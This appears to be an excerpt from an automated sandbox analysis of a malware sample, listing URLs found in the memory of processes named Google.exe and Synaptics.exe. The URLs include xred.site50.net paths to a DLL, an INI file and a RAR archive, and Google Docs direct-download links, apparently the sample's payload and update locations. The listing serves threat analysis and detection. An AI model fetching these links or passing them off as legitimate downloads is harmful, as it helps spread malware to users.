                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                            Source: Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                            Source: Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                            Source: Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/0
                            Source: Synaptics.exe, 00000007.00000003.1631073537.000000000548F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/0(
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/5
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GfPIZfSVlVsOGlEVGxuZVk&export=download
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GlEVGxuZVk&export=download;
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GlEVGxuZVk&export=downloadE
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/N
                            Source: Synaptics.exe, 00000007.00000003.1631073537.000000000548F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/P
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ent.sandbox.google.com
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/Could
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/Microsoft
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/user
                            Source: Synaptics.exe, 00000007.00000003.1631073537.000000000548F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/pKt
                            Source: Synaptics.exe, 00000007.00000002.1740188857.0000000004C5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2335565313.000000001A8FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2276373803.000000000D4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2320961601.00000000157BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0B
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0B8
                            Source: Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPI
                            Source: Google.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                            Source: Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                            Source: Synaptics.exe, 00000007.00000003.1630718381.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&expor
                            Source: Google.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloL
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2276049411.000000000D23E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2335185888.000000001A67E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2279404930.000000000EB3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2327778647.000000001797E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2246323163.000000000626E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883242733.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2347134146.000000001D5FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2320161514.00000000153FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2332878037.000000001977E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2333847697.0000000019DBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2335772086.000000001AA3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2276221633.000000000D37E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2330181567.000000001887E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2271735104.000000000BCFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2305371952.000000001033E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2310833659.00000000121FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2307121797.0000000010D3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2303801967.000000000F93E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2331734194.000000001913E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2270602345.000000000B43E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                            Source: Synaptics.exe, 0000001A.00000002.2323861082.000000001657E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#j
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#x4
                            Source: Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$.
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$Pn$
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$e
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$i
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$m
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$o%
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%S$
                            Source: Synaptics.exe, 00000007.00000003.1630718381.0000000000610000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%e
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%p
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%u
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&kn
                            Source: Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.0000000007099000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(Z
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)Ps$
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)m
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)r
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)w
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-B
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-B/L
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-BG20&r
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-BKL$$r
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Bze
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-R
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-src
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-v
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883242733.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.2mdD
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.:x$
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.amppy
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.3
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.dv$
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.jp
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.moo
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.mx
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.net
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.net.
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.uW
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.~
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/Vi&;
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/b
                            Source: Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
